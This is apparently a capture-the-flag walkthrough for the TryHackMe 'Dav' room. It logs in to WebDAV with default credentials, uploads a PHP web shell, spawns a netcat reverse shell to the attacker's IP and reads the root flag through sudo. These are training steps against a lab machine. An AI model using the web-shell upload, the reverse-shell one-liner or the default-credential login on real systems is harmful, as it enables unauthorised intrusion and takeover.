Dav

Room Link: https://tryhackme.com/room/bsidesgtdav

Kali

nmap -A $VICTIM

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

We were able to login with the following default credentials

Username: wampp
Password: xampp

I tried cracking the hash but it wasn't working

Kali

hashcat -m 1600 passwd.dav /usr/share/wordlists/rockyou.txt

Using the credentials found earlier I was able to access the site using cadaver and upload a shell.

Kali

git clone https://github.com/flozz/p0wny-shell.git
cp p0wny-shell/shell.php shell.php

Kali

cadaver http://$VICTIM:80/webdav
Username: wampp
Password: xampp
dav:/webdav/> put shell.php shell.php

Kali

nc -lvnp 1337

Victim

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.100.133 1337 >/tmp/f

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

sudo -l

I first tried reading shadow to crack the users credentials but it wasn't working so I ended up just reading the flag.

Victim

LFILE=/root/root.txt
sudo cat "$LFILE"

Last updated 1 year ago